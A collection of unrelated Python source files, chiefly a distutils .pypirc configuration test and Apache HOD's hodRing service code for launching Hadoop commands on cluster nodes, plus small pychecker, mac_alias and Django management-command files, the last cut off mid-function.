LaoZhongGu/kbengine | refs/heads/master | kbe/res/scripts/common/Lib/distutils/tests/test_config.py | 53 | """Tests for distutils.pypirc.pypirc."""
import sys
import os
import unittest
import tempfile
from distutils.core import PyPIRCCommand
from distutils.core import Distribution
from distutils.log import set_threshold
from distutils.log import WARN
from distutils.tests import support
from test.support import run_unittest
PYPIRC = """\
[distutils]
index-servers =
server1
server2
[server1]
username:me
password:secret
[server2]
username:meagain
password: secret
realm:acme
repository:http://another.pypi/
"""
PYPIRC_OLD = """\
[server-login]
username:tarek
password:secret
"""
WANTED = """\
[distutils]
index-servers =
pypi
[pypi]
username:tarek
password:xxx
"""
class PyPIRCCommandTestCase(support.TempdirManager,
support.LoggingSilencer,
support.EnvironGuard,
unittest.TestCase):
def setUp(self):
"""Patches the environment."""
super(PyPIRCCommandTestCase, self).setUp()
self.tmp_dir = self.mkdtemp()
os.environ['HOME'] = self.tmp_dir
self.rc = os.path.join(self.tmp_dir, '.pypirc')
self.dist = Distribution()
class command(PyPIRCCommand):
def __init__(self, dist):
PyPIRCCommand.__init__(self, dist)
def initialize_options(self):
pass
finalize_options = initialize_options
self._cmd = command
self.old_threshold = set_threshold(WARN)
def tearDown(self):
"""Removes the patch."""
set_threshold(self.old_threshold)
super(PyPIRCCommandTestCase, self).tearDown()
def test_server_registration(self):
# This test makes sure PyPIRCCommand knows how to:
# 1. handle several sections in .pypirc
# 2. handle the old format
# new format
self.write_file(self.rc, PYPIRC)
cmd = self._cmd(self.dist)
config = cmd._read_pypirc()
config = list(sorted(config.items()))
waited = [('password', 'secret'), ('realm', 'pypi'),
('repository', 'http://pypi.python.org/pypi'),
('server', 'server1'), ('username', 'me')]
self.assertEqual(config, waited)
# old format
self.write_file(self.rc, PYPIRC_OLD)
config = cmd._read_pypirc()
config = list(sorted(config.items()))
waited = [('password', 'secret'), ('realm', 'pypi'),
('repository', 'http://pypi.python.org/pypi'),
('server', 'server-login'), ('username', 'tarek')]
self.assertEqual(config, waited)
def test_server_empty_registration(self):
cmd = self._cmd(self.dist)
rc = cmd._get_rc_file()
self.assertTrue(not os.path.exists(rc))
cmd._store_pypirc('tarek', 'xxx')
self.assertTrue(os.path.exists(rc))
f = open(rc)
try:
content = f.read()
self.assertEqual(content, WANTED)
finally:
f.close()
def test_suite():
return unittest.makeSuite(PyPIRCCommandTestCase)
if __name__ == "__main__":
run_unittest(test_suite())
|
zincumyx/Mammoth | refs/heads/master | mammoth-src/src/contrib/hod/hodlib/HodRing/hodRing.py | 118 | #Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
#!/usr/bin/env python
"""hodring launches hadoop commands on work node and
cleans up all the work dirs afterward
"""
# -*- python -*-
import os, sys, time, shutil, getpass, xml.dom.minidom, xml.dom.pulldom
import socket, sets, urllib, csv, signal, pprint, random, re, httplib
from xml.dom import getDOMImplementation
from pprint import pformat
from optparse import OptionParser
from urlparse import urlparse
from hodlib.Common.util import local_fqdn, parseEquals, getMapredSystemDirectory, isProcessRunning
from hodlib.Common.tcp import tcpSocket, tcpError
binfile = sys.path[0]
libdir = os.path.dirname(binfile)
sys.path.append(libdir)
import hodlib.Common.logger
from hodlib.GridServices.service import *
from hodlib.Common.util import *
from hodlib.Common.socketServers import threadedHTTPServer
from hodlib.Common.hodsvc import hodBaseService
from hodlib.Common.threads import simpleCommand
from hodlib.Common.xmlrpc import hodXRClient
mswindows = (sys.platform == "win32")
originalcwd = os.getcwd()
reHdfsURI = re.compile("hdfs://(.*?:\d+)(.*)")
class CommandDesc:
"""A class that represents the commands that
are run by hodring"""
def __init__(self, dict, log):
self.log = log
self.log.debug("In command desc")
self.log.debug("Done in command desc")
dict.setdefault('argv', [])
dict.setdefault('version', None)
dict.setdefault('envs', {})
dict.setdefault('workdirs', [])
dict.setdefault('attrs', {})
dict.setdefault('final-attrs', {})
dict.setdefault('fg', False)
dict.setdefault('ignorefailures', False)
dict.setdefault('stdin', None)
self.log.debug("Printing dict")
self._checkRequired(dict)
self.dict = dict
def _checkRequired(self, dict):
if 'name' not in dict:
raise ValueError, "Command description lacks 'name'"
if 'program' not in dict:
raise ValueError, "Command description lacks 'program'"
if 'pkgdirs' not in dict:
raise ValueError, "Command description lacks 'pkgdirs'"
def getName(self):
return self.dict['name']
def getProgram(self):
return self.dict['program']
def getArgv(self):
return self.dict['argv']
def getVersion(self):
return self.dict['version']
def getEnvs(self):
return self.dict['envs']
def getPkgDirs(self):
return self.dict['pkgdirs']
def getWorkDirs(self):
return self.dict['workdirs']
def getAttrs(self):
return self.dict['attrs']
def getfinalAttrs(self):
return self.dict['final-attrs']
def isForeground(self):
return self.dict['fg']
def isIgnoreFailures(self):
return self.dict['ignorefailures']
def getStdin(self):
return self.dict['stdin']
def parseDesc(str):
dict = CommandDesc._parseMap(str)
dict['argv'] = CommandDesc._parseList(dict['argv'])
dict['envs'] = CommandDesc._parseMap(dict['envs'])
dict['pkgdirs'] = CommandDesc._parseList(dict['pkgdirs'], ':')
dict['workdirs'] = CommandDesc._parseList(dict['workdirs'], ':')
dict['attrs'] = CommandDesc._parseMap(dict['attrs'])
dict['final-attrs'] = CommandDesc._parseMap(dict['final-attrs'])
return CommandDesc(dict)
parseDesc = staticmethod(parseDesc)
def _parseList(str, delim = ','):
list = []
for row in csv.reader([str], delimiter=delim, escapechar='\\',
quoting=csv.QUOTE_NONE, doublequote=False):
list.extend(row)
return list
_parseList = staticmethod(_parseList)
def _parseMap(str):
"""Parses key value pairs"""
dict = {}
for row in csv.reader([str], escapechar='\\', quoting=csv.QUOTE_NONE, doublequote=False):
for f in row:
[k, v] = f.split('=', 1)
dict[k] = v
return dict
_parseMap = staticmethod(_parseMap)
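  # For illustration: _parseList("dir1:dir2", ':') yields ['dir1', 'dir2'] and
  # _parseMap("k1=v1,k2=v2") yields {'k1': 'v1', 'k2': 'v2'}; a backslash
  # escapes a literal delimiter inside a value.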
class MRSystemDirectoryManager:
"""Class that is responsible for managing the MapReduce system directory"""
def __init__(self, jtPid, mrSysDir, fsName, hadoopPath, log, retries=120):
self.__jtPid = jtPid
self.__mrSysDir = mrSysDir
self.__fsName = fsName
self.__hadoopPath = hadoopPath
self.__log = log
self.__retries = retries
def toCleanupArgs(self):
return " --jt-pid %s --mr-sys-dir %s --fs-name %s --hadoop-path %s " \
% (self.__jtPid, self.__mrSysDir, self.__fsName, self.__hadoopPath)
def removeMRSystemDirectory(self):
jtActive = isProcessRunning(self.__jtPid)
count = 0 # try for a max of a minute for the process to end
while jtActive and (count<self.__retries):
time.sleep(0.5)
jtActive = isProcessRunning(self.__jtPid)
count += 1
if count == self.__retries:
      self.__log.warn('Job Tracker did not exit even after a minute. Not going to try to clean up the system directory')
return
self.__log.debug('jt is now inactive')
cmd = "%s dfs -fs hdfs://%s -rmr %s" % (self.__hadoopPath, self.__fsName, \
self.__mrSysDir)
self.__log.debug('Command to run to remove system directory: %s' % (cmd))
try:
hadoopCommand = simpleCommand('mr-sys-dir-cleaner', cmd)
hadoopCommand.start()
hadoopCommand.wait()
hadoopCommand.join()
ret = hadoopCommand.exit_code()
if ret != 0:
self.__log.warn("Error in removing MapReduce system directory '%s' from '%s' using path '%s'" \
% (self.__mrSysDir, self.__fsName, self.__hadoopPath))
self.__log.warn(pprint.pformat(hadoopCommand.output()))
else:
self.__log.info("Removed MapReduce system directory successfully.")
except:
self.__log.error('Exception while cleaning up MapReduce system directory. May not be cleaned up. %s', \
get_exception_error_string())
self.__log.debug(get_exception_string())
def createMRSystemDirectoryManager(dict, log):
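  # For example (values illustrative), a dict such as {'jt-pid': '1234',
  # 'mr-sys-dir': '/mapredsystem/hod.1', 'fs-name': 'namenode:9000',
  # 'hadoop-path': '/pkg/bin/hadoop'} yields a manager; if any of these keys
  # is missing or None, no manager is created.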
keys = [ 'jt-pid', 'mr-sys-dir', 'fs-name', 'hadoop-path' ]
for key in keys:
if (not dict.has_key(key)) or (dict[key] is None):
return None
mrSysDirManager = MRSystemDirectoryManager(int(dict['jt-pid']), dict['mr-sys-dir'], \
dict['fs-name'], dict['hadoop-path'], log)
return mrSysDirManager
class HadoopCommand:
"""Runs a single hadoop command"""
def __init__(self, id, desc, tempdir, tardir, hadoopportrange, log, javahome,
mrSysDir, restart=False):
self.desc = desc
self.log = log
self.javahome = javahome
self.__mrSysDir = mrSysDir
self.program = desc.getProgram()
self.name = desc.getName()
self.workdirs = desc.getWorkDirs()
self.hadoopdir = tempdir
self.confdir = os.path.join(self.hadoopdir, '%d-%s' % (id, self.name),
"confdir")
self.logdir = os.path.join(self.hadoopdir, '%d-%s' % (id, self.name),
"logdir")
self.out = os.path.join(self.logdir, '%s.out' % self.name)
self.err = os.path.join(self.logdir, '%s.err' % self.name)
self.child = None
self.restart = restart
self.filledInKeyVals = []
self.__hadoopPortRange = hadoopportrange
self._createWorkDirs()
self._createHadoopSiteXml()
self._createHadoopLogDir()
self.__hadoopThread = None
self.stdErrContents = "" # store list of contents for returning to user
def _createWorkDirs(self):
for dir in self.workdirs:
if os.path.exists(dir):
if not os.access(dir, os.F_OK | os.R_OK | os.W_OK | os.X_OK):
raise ValueError, "Workdir %s does not allow rwx permission." % (dir)
continue
try:
os.makedirs(dir)
except:
pass
def getFilledInKeyValues(self):
return self.filledInKeyVals
def createXML(self, doc, attr, topElement, final):
for k,v in attr.iteritems():
self.log.debug('_createHadoopSiteXml: ' + str(k) + " " + str(v))
lowport, highport = self.__hadoopPortRange
if ( v == "fillinport" ):
v = "%d" % (ServiceUtil.getUniqRandomPort(low=lowport, high=highport, log=self.log))
keyvalpair = ''
if isinstance(v, (tuple, list)):
for item in v:
keyvalpair = "%s%s=%s," % (keyvalpair, k, item)
keyvalpair = keyvalpair[:-1]
else:
keyvalpair = k + '=' + v
self.filledInKeyVals.append(keyvalpair)
if(k == "mapred.job.tracker"): # total hack for time's sake
keyvalpair = k + "=" + v
self.filledInKeyVals.append(keyvalpair)
if ( v == "fillinhostport"):
port = "%d" % (ServiceUtil.getUniqRandomPort(low=lowport, high=highport, log=self.log))
self.log.debug('Setting hostname to: %s' % local_fqdn())
v = local_fqdn() + ':' + port
keyvalpair = ''
if isinstance(v, (tuple, list)):
for item in v:
keyvalpair = "%s%s=%s," % (keyvalpair, k, item)
keyvalpair = keyvalpair[:-1]
else:
keyvalpair = k + '=' + v
self.filledInKeyVals.append(keyvalpair)
if ( v == "fillindir"):
v = self.__mrSysDir
pass
prop = None
if isinstance(v, (tuple, list)):
for item in v:
prop = self._createXmlElement(doc, k, item, "No description", final)
topElement.appendChild(prop)
else:
if k == 'fs.default.name':
prop = self._createXmlElement(doc, k, "hdfs://" + v, "No description", final)
else:
prop = self._createXmlElement(doc, k, v, "No description", final)
topElement.appendChild(prop)
def _createHadoopSiteXml(self):
if self.restart:
if not os.path.exists(self.confdir):
os.makedirs(self.confdir)
else:
assert os.path.exists(self.confdir) == False
os.makedirs(self.confdir)
implementation = getDOMImplementation()
doc = implementation.createDocument('', 'configuration', None)
comment = doc.createComment("This is an auto generated hadoop-site.xml, do not modify")
topElement = doc.documentElement
topElement.appendChild(comment)
finalAttr = self.desc.getfinalAttrs()
self.createXML(doc, finalAttr, topElement, True)
attr = {}
attr1 = self.desc.getAttrs()
for k,v in attr1.iteritems():
if not finalAttr.has_key(k):
attr[k] = v
self.createXML(doc, attr, topElement, False)
siteName = os.path.join(self.confdir, "hadoop-site.xml")
sitefile = file(siteName, 'w')
print >> sitefile, topElement.toxml()
sitefile.close()
self.log.debug('created %s' % (siteName))
def _createHadoopLogDir(self):
if self.restart:
if not os.path.exists(self.logdir):
os.makedirs(self.logdir)
else:
assert os.path.exists(self.logdir) == False
os.makedirs(self.logdir)
def _createXmlElement(self, doc, name, value, description, final):
prop = doc.createElement("property")
nameP = doc.createElement("name")
string = doc.createTextNode(name)
nameP.appendChild(string)
valueP = doc.createElement("value")
string = doc.createTextNode(value)
valueP.appendChild(string)
desc = doc.createElement("description")
string = doc.createTextNode(description)
desc.appendChild(string)
prop.appendChild(nameP)
prop.appendChild(valueP)
prop.appendChild(desc)
if (final):
felement = doc.createElement("final")
string = doc.createTextNode("true")
felement.appendChild(string)
prop.appendChild(felement)
pass
return prop
def getMRSystemDirectoryManager(self):
return MRSystemDirectoryManager(self.__hadoopThread.getPid(), self.__mrSysDir, \
self.desc.getfinalAttrs()['fs.default.name'], \
self.path, self.log)
def run(self, dir):
status = True
args = []
desc = self.desc
self.log.debug(pprint.pformat(desc.dict))
self.log.debug("Got package dir of %s" % dir)
self.path = os.path.join(dir, self.program)
self.log.debug("path: %s" % self.path)
args.append(self.path)
args.extend(desc.getArgv())
envs = desc.getEnvs()
fenvs = os.environ
for k, v in envs.iteritems():
fenvs[k] = v
if envs.has_key('HADOOP_OPTS'):
fenvs['HADOOP_OPTS'] = envs['HADOOP_OPTS']
self.log.debug("HADOOP_OPTS : %s" % fenvs['HADOOP_OPTS'])
fenvs['JAVA_HOME'] = self.javahome
fenvs['HADOOP_CONF_DIR'] = self.confdir
fenvs['HADOOP_LOG_DIR'] = self.logdir
self.log.info(pprint.pformat(fenvs))
hadoopCommand = ''
for item in args:
hadoopCommand = "%s%s " % (hadoopCommand, item)
# Redirecting output and error to self.out and self.err
hadoopCommand = hadoopCommand + ' 1>%s 2>%s ' % (self.out, self.err)
self.log.debug('running command: %s' % (hadoopCommand))
self.log.debug('hadoop env: %s' % fenvs)
self.log.debug('Command stdout will be redirected to %s ' % self.out + \
'and command stderr to %s' % self.err)
self.__hadoopThread = simpleCommand('hadoop', hadoopCommand, env=fenvs)
self.__hadoopThread.start()
while self.__hadoopThread.stdin == None:
time.sleep(.2)
self.log.debug("hadoopThread still == None ...")
input = desc.getStdin()
self.log.debug("hadoop input: %s" % input)
if input:
if self.__hadoopThread.is_running():
print >>self.__hadoopThread.stdin, input
else:
self.log.error("hadoop command failed to start")
self.__hadoopThread.stdin.close()
self.log.debug("isForground: %s" % desc.isForeground())
if desc.isForeground():
self.log.debug("Waiting on hadoop to finish...")
self.__hadoopThread.wait()
self.log.debug("Joining hadoop thread...")
self.__hadoopThread.join()
if self.__hadoopThread.exit_code() != 0:
status = False
else:
status = self.getCommandStatus()
self.log.debug("hadoop run status: %s" % status)
if status == False:
self.handleFailedCommand()
if (status == True) or (not desc.isIgnoreFailures()):
return status
else:
self.log.error("Ignoring Failure")
return True
def kill(self):
self.__hadoopThread.kill()
if self.__hadoopThread:
self.__hadoopThread.join()
def addCleanup(self, list):
list.extend(self.workdirs)
list.append(self.confdir)
def getCommandStatus(self):
status = True
ec = self.__hadoopThread.exit_code()
if (ec != 0) and (ec != None):
status = False
return status
def handleFailedCommand(self):
self.log.error('hadoop error: %s' % (
self.__hadoopThread.exit_status_string()))
# read the contents of redirected stderr to print information back to user
if os.path.exists(self.err):
f = None
try:
f = open(self.err)
lines = f.readlines()
# format
for line in lines:
self.stdErrContents = "%s%s" % (self.stdErrContents, line)
finally:
if f is not None:
f.close()
self.log.error('See %s.out and/or %s.err for details. They are ' % \
(self.name, self.name) + \
'located at subdirectories under either ' + \
'hodring.work-dirs or hodring.log-destination-uri.')
class HodRing(hodBaseService):
"""The main class for hodring that
polls the commands it runs"""
def __init__(self, config):
hodBaseService.__init__(self, 'hodring', config['hodring'])
self.log = self.logs['main']
self._http = None
self.__pkg = None
self.__pkgDir = None
self.__tempDir = None
self.__running = {}
self.__hadoopLogDirs = []
self.__init_temp_dir()
def __init_temp_dir(self):
self.__tempDir = os.path.join(self._cfg['temp-dir'],
"%s.%s.hodring" % (self._cfg['userid'],
self._cfg['service-id']))
if not os.path.exists(self.__tempDir):
os.makedirs(self.__tempDir)
os.chdir(self.__tempDir)
def __fetch(self, url, spath):
retry = 3
success = False
while (retry != 0 and success != True):
try:
input = urllib.urlopen(url)
bufsz = 81920
buf = input.read(bufsz)
out = open(spath, 'w')
while len(buf) > 0:
out.write(buf)
buf = input.read(bufsz)
input.close()
out.close()
success = True
except:
self.log.debug("Failed to copy file")
retry = retry - 1
if (retry == 0 and success != True):
raise IOError, "Failed to copy the files"
def __get_name(self, addr):
parsedUrl = urlparse(addr)
path = parsedUrl[2]
split = path.split('/', 1)
return split[1]
def __get_dir(self, name):
"""Return the root directory inside the tarball
specified by name. Assumes that the tarball begins
with a root directory."""
import tarfile
myTarFile = tarfile.open(name)
hadoopPackage = myTarFile.getnames()[0]
self.log.debug("tarball name : %s hadoop package name : %s" %(name,hadoopPackage))
return hadoopPackage
def getRunningValues(self):
return self.__running.values()
def getTempDir(self):
return self.__tempDir
def getHadoopLogDirs(self):
return self.__hadoopLogDirs
def __download_package(self, ringClient):
self.log.debug("Found download address: %s" %
self._cfg['download-addr'])
try:
addr = 'none'
downloadTime = self._cfg['tarball-retry-initial-time'] # download time depends on tarball size and network bandwidth
increment = 0
addr = ringClient.getTarList(self.hostname)
while(addr == 'none'):
rand = self._cfg['tarball-retry-initial-time'] + increment + \
random.uniform(0,self._cfg['tarball-retry-interval'])
increment = increment + 1
self.log.debug("got no tarball. Retrying again in %s seconds." % rand)
time.sleep(rand)
addr = ringClient.getTarList(self.hostname)
self.log.debug("got this address %s" % addr)
tarName = self.__get_name(addr)
self.log.debug("tar package name: %s" % tarName)
fetchPath = os.path.join(os.getcwd(), tarName)
self.log.debug("fetch path: %s" % fetchPath)
self.__fetch(addr, fetchPath)
self.log.debug("done fetching")
tarUrl = "http://%s:%d/%s" % (self._http.server_address[0],
self._http.server_address[1],
tarName)
try:
ringClient.registerTarSource(self.hostname, tarUrl,addr)
#ringClient.tarDone(addr)
except KeyError, e:
self.log.error("registerTarSource and tarDone failed: ", e)
raise KeyError(e)
check = untar(fetchPath, os.getcwd())
if (check == False):
raise IOError, "Untarring failed."
self.__pkg = self.__get_dir(tarName)
self.__pkgDir = os.path.join(os.getcwd(), self.__pkg)
except Exception, e:
self.log.error("Failed download tar package: %s" %
get_exception_error_string())
raise Exception(e)
def __run_hadoop_commands(self, restart=True):
id = 0
for desc in self._cfg['commanddesc']:
self.log.debug(pprint.pformat(desc.dict))
mrSysDir = getMapredSystemDirectory(self._cfg['mapred-system-dir-root'],
self._cfg['userid'], self._cfg['service-id'])
self.log.debug('mrsysdir is %s' % mrSysDir)
cmd = HadoopCommand(id, desc, self.__tempDir, self.__pkgDir, self._cfg['hadoop-port-range'], self.log,
self._cfg['java-home'], mrSysDir, restart)
self.__hadoopLogDirs.append(cmd.logdir)
self.log.debug("hadoop log directory: %s" % self.__hadoopLogDirs)
try:
# if the tarball isn't there, we use the pkgs dir given.
if self.__pkgDir == None:
pkgdir = desc.getPkgDirs()
else:
pkgdir = self.__pkgDir
        self.log.debug('This is the package dir %s ' % (pkgdir))
if not cmd.run(pkgdir):
addnInfo = ""
if cmd.stdErrContents is not "":
addnInfo = " Information from stderr of the command:\n%s" % (cmd.stdErrContents)
raise Exception("Could not launch the %s using %s/bin/hadoop.%s" % (desc.getName(), pkgdir, addnInfo))
except Exception, e:
self.log.debug("Exception running hadoop command: %s\n%s" % (get_exception_error_string(), get_exception_string()))
self.__running[id] = cmd
raise Exception(e)
id += 1
if desc.isForeground():
continue
self.__running[id-1] = cmd
# ok.. now command is running. If this HodRing got jobtracker,
# Check if it is ready for accepting jobs, and then only return
self.__check_jobtracker(desc, id-1, pkgdir)
def __check_jobtracker(self, desc, id, pkgdir):
# Check jobtracker status. Return properly if it is ready to accept jobs.
# Currently Checks for Jetty to come up, the last thing that can be checked
# before JT completes initialisation. To be perfectly reliable, we need
# hadoop support
name = desc.getName()
if name == 'jobtracker':
# Yes I am the Jobtracker
self.log.debug("Waiting for jobtracker to initialise")
version = desc.getVersion()
self.log.debug("jobtracker version : %s" % version)
hadoopCmd = self.getRunningValues()[id]
attrs = hadoopCmd.getFilledInKeyValues()
attrs = parseEquals(attrs)
jobTrackerAddr = attrs['mapred.job.tracker']
self.log.debug("jobtracker rpc server : %s" % jobTrackerAddr)
if version < 16:
jettyAddr = jobTrackerAddr.split(':')[0] + ':' + \
attrs['mapred.job.tracker.info.port']
else:
jettyAddr = attrs['mapred.job.tracker.http.address']
self.log.debug("Jobtracker jetty : %s" % jettyAddr)
# Check for Jetty to come up
# For this do a http head, and then look at the status
defaultTimeout = socket.getdefaulttimeout()
      # socket timeout isn't exposed at httplib level. Setting explicitly.
socket.setdefaulttimeout(1)
sleepTime = 0.5
jettyStatus = False
jettyStatusmsg = ""
while sleepTime <= 32:
# There is a possibility that the command might fail after a while.
# This code will check if the command failed so that a better
# error message can be returned to the user.
if not hadoopCmd.getCommandStatus():
self.log.critical('Hadoop command found to have failed when ' \
'checking for jobtracker status')
hadoopCmd.handleFailedCommand()
addnInfo = ""
if hadoopCmd.stdErrContents is not "":
addnInfo = " Information from stderr of the command:\n%s" \
% (hadoopCmd.stdErrContents)
raise Exception("Could not launch the %s using %s/bin/hadoop.%s" \
% (desc.getName(), pkgdir, addnInfo))
try:
jettyConn = httplib.HTTPConnection(jettyAddr)
jettyConn.request("HEAD", "/jobtracker.jsp")
# httplib inherently retries the following till socket timeout
resp = jettyConn.getresponse()
if resp.status != 200:
# Some problem?
jettyStatus = False
jettyStatusmsg = "Jetty gave a non-200 response to a HTTP-HEAD" +\
" request. HTTP Status (Code, Msg): (%s, %s)" % \
( resp.status, resp.reason )
break
else:
self.log.info("Jetty returned a 200 status (%s)" % resp.reason)
self.log.info("JobTracker successfully initialised")
return
except socket.error:
self.log.debug("Jetty gave a socket error. Sleeping for %s" \
% sleepTime)
time.sleep(sleepTime)
sleepTime = sleepTime * 2
except Exception, e:
jettyStatus = False
jettyStatusmsg = ("Process(possibly other than jetty) running on" + \
" port assigned to jetty is returning invalid http response")
break
socket.setdefaulttimeout(defaultTimeout)
if not jettyStatus:
self.log.critical("Jobtracker failed to initialise.")
if jettyStatusmsg:
self.log.critical( "Reason: %s" % jettyStatusmsg )
else: self.log.critical( "Reason: Jetty failed to give response")
raise Exception("JobTracker failed to initialise")
def stop(self):
self.log.debug("Entered hodring stop.")
if self._http:
self.log.debug("stopping http server...")
self._http.stop()
self.log.debug("call hodsvcrgy stop...")
hodBaseService.stop(self)
def _xr_method_clusterStart(self, initialize=True):
return self.clusterStart(initialize)
def _xr_method_clusterStop(self):
return self.clusterStop()
def start(self):
"""Run and maintain hodring commands"""
try:
if self._cfg.has_key('download-addr'):
self._http = threadedHTTPServer('', self._cfg['http-port-range'])
self.log.info("Starting http server...")
self._http.serve_forever()
self.log.debug("http://%s:%d" % (self._http.server_address[0],
self._http.server_address[1]))
hodBaseService.start(self)
ringXRAddress = None
if self._cfg.has_key('ringmaster-xrs-addr'):
ringXRAddress = "http://%s:%s/" % (self._cfg['ringmaster-xrs-addr'][0],
self._cfg['ringmaster-xrs-addr'][1])
self.log.debug("Ringmaster at %s" % ringXRAddress)
self.log.debug("Creating service registry XML-RPC client.")
serviceClient = hodXRClient(to_http_url(
self._cfg['svcrgy-addr']))
if ringXRAddress == None:
self.log.info("Did not get ringmaster XML-RPC address. Fetching information from service registry.")
ringList = serviceClient.getServiceInfo(self._cfg['userid'],
self._cfg['service-id'], 'ringmaster', 'hod')
self.log.debug(pprint.pformat(ringList))
if len(ringList):
if isinstance(ringList, list):
ringXRAddress = ringList[0]['xrs']
count = 0
while (ringXRAddress == None and count < 3000):
ringList = serviceClient.getServiceInfo(self._cfg['userid'],
self._cfg['service-id'], 'ringmaster', 'hod')
if len(ringList):
if isinstance(ringList, list):
ringXRAddress = ringList[0]['xrs']
count = count + 1
time.sleep(.2)
if ringXRAddress == None:
raise Exception("Could not get ringmaster XML-RPC server address.")
self.log.debug("Creating ringmaster XML-RPC client.")
ringClient = hodXRClient(ringXRAddress)
id = self.hostname + "_" + str(os.getpid())
if 'download-addr' in self._cfg:
self.__download_package(ringClient)
else:
self.log.debug("Did not find a download address.")
cmdlist = []
firstTime = True
increment = 0
hadoopStartupTime = 2
cmdlist = ringClient.getCommand(id)
while (cmdlist == []):
if firstTime:
sleepTime = increment + self._cfg['cmd-retry-initial-time'] + hadoopStartupTime\
+ random.uniform(0,self._cfg['cmd-retry-interval'])
firstTime = False
else:
          sleepTime = increment + self._cfg['cmd-retry-initial-time'] + \
                      random.uniform(0,self._cfg['cmd-retry-interval'])
self.log.debug("Did not get command list. Waiting for %s seconds." % (sleepTime))
time.sleep(sleepTime)
increment = increment + 1
cmdlist = ringClient.getCommand(id)
self.log.debug(pformat(cmdlist))
cmdDescs = []
for cmds in cmdlist:
cmdDescs.append(CommandDesc(cmds['dict'], self.log))
self._cfg['commanddesc'] = cmdDescs
self.log.info("Running hadoop commands...")
self.__run_hadoop_commands(False)
masterParams = []
for k, cmd in self.__running.iteritems():
masterParams.extend(cmd.filledInKeyVals)
self.log.debug("printing getparams")
self.log.debug(pformat(id))
self.log.debug(pformat(masterParams))
# when this is on a required host, the ringMaster already has our masterParams
if(len(masterParams) > 0):
ringClient.addMasterParams(id, masterParams)
except Exception, e:
raise Exception(e)
def clusterStart(self, initialize=True):
"""Start a stopped mapreduce/dfs cluster"""
if initialize:
self.log.debug('clusterStart Method Invoked - Initialize')
else:
self.log.debug('clusterStart Method Invoked - No Initialize')
try:
self.log.debug("Creating service registry XML-RPC client.")
serviceClient = hodXRClient(to_http_url(self._cfg['svcrgy-addr']),
None, None, 0, 0, 0)
self.log.info("Fetching ringmaster information from service registry.")
count = 0
ringXRAddress = None
while (ringXRAddress == None and count < 3000):
ringList = serviceClient.getServiceInfo(self._cfg['userid'],
self._cfg['service-id'], 'ringmaster', 'hod')
if len(ringList):
if isinstance(ringList, list):
ringXRAddress = ringList[0]['xrs']
count = count + 1
if ringXRAddress == None:
raise Exception("Could not get ringmaster XML-RPC server address.")
self.log.debug("Creating ringmaster XML-RPC client.")
ringClient = hodXRClient(ringXRAddress, None, None, 0, 0, 0)
id = self.hostname + "_" + str(os.getpid())
cmdlist = []
if initialize:
if 'download-addr' in self._cfg:
self.__download_package(ringClient)
else:
self.log.debug("Did not find a download address.")
while (cmdlist == []):
cmdlist = ringClient.getCommand(id)
else:
while (cmdlist == []):
cmdlist = ringClient.getAdminCommand(id)
self.log.debug(pformat(cmdlist))
cmdDescs = []
for cmds in cmdlist:
cmdDescs.append(CommandDesc(cmds['dict'], self.log))
self._cfg['commanddesc'] = cmdDescs
if initialize:
self.log.info("Running hadoop commands again... - Initialize")
self.__run_hadoop_commands()
masterParams = []
for k, cmd in self.__running.iteritems():
self.log.debug(cmd)
masterParams.extend(cmd.filledInKeyVals)
self.log.debug("printing getparams")
self.log.debug(pformat(id))
self.log.debug(pformat(masterParams))
# when this is on a required host, the ringMaster already has our masterParams
if(len(masterParams) > 0):
ringClient.addMasterParams(id, masterParams)
else:
self.log.info("Running hadoop commands again... - No Initialize")
self.__run_hadoop_commands()
except:
self.log.error(get_exception_string())
return True
def clusterStop(self):
"""Stop a running mapreduce/dfs cluster without stopping the hodring"""
self.log.debug('clusterStop Method Invoked')
try:
for cmd in self.__running.values():
cmd.kill()
self.__running = {}
except:
self.log.error(get_exception_string())
return True
|
jianlirong/incubator-hawq | refs/heads/master | tools/bin/pythonSrc/pychecker-0.8.18/test_input/test3.py | 11 |
"Shouldn't be any warnings/errors"
import string
def describeSyntax(syntax):
return string.join(['<%s>' % x.Description])
from UserDict import UserDict
class jj(UserDict) :
def __init__(self):
UserDict.__init__(self)
|
losywee/rethinkdb | refs/heads/next | packaging/osx/mac_alias/__init__.py | 50 | from .alias import *
__all__ = [ 'ALIAS_KIND_FILE', 'ALIAS_KIND_FOLDER',
'ALIAS_HFS_VOLUME_SIGNATURE',
'ALIAS_FIXED_DISK', 'ALIAS_NETWORK_DISK', 'ALIAS_400KB_FLOPPY_DISK',
'ALIAS_800KB_FLOPPY_DISK', 'ALIAS_1_44MB_FLOPPY_DISK',
'ALIAS_EJECTABLE_DISK',
'ALIAS_NO_CNID',
'AppleShareInfo',
'VolumeInfo',
'TargetInfo',
'Alias' ]
|
smart-classic/smart_server | refs/heads/master | django_concurrent_test_server/management/commands/runconcurrentserver.py | 4 | from django.core.management.base import BaseCommand, CommandError
from optparse import make_option
import os
import sys
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--noreload', action='store_false', dest='use_reloader', default=True,
help='Tells Django to NOT use the auto-reloader.'),
make_option('--adminmedia', dest='admin_media_path', default='',
help='Specifies the directory from which to serve admin media.'),
)
help = "Starts a lightweight Web server for development."
args = '[optional port number, or ipaddr:port]'
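    # Typical invocations (illustrative): "./manage.py runconcurrentserver" or
    # "./manage.py runconcurrentserver 0.0.0.0:8080 --noreload".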
# Validation is called explicitly each time the server is reloaded.
requires_model_validation = False
def handle(self, addrport='', *args, **options):
import django
from django.core.servers.basehttp import AdminMediaHandler, WSGIServerException
from django.core.handlers.wsgi import WSGIHandler
from django_concurrent_test_server.servers import run
if args:
raise CommandError('Usage is runserver %s' % self.args)
if not addrport:
addr = ''
port = '8000'
else:
try:
addr, port = addrport.split(':')
except ValueError:
addr, port = '', addrport
if not addr:
addr = '127.0.0.1'
if not port.isdigit():
raise CommandError("%r is not a valid port number." % port)
use_reloader = options.get('use_reloader', True)
admin_media_path = options.get('admin_media_path', '')
shutdown_message = options.get('shutdown_message', '')
quit_command = (sys.platform == 'win32') and 'CTRL-BREAK' or 'CONTROL-C'
def inner_run():
from django.conf import settings
